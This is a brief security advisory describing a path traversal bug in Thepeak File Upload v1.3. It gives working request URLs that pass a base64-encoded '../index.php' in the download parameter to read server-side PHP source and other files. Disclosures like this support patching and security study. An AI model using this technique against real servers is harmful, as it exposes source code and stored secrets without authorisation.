Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.
There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,...) from server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form
Now, we upload one file to server, ex : test.jpg -->ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
anh url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " test.jpg"
We need get source file http://somesite.com/index.php.
Encode 64 path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)
http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw
You can also download other files.
Have fun!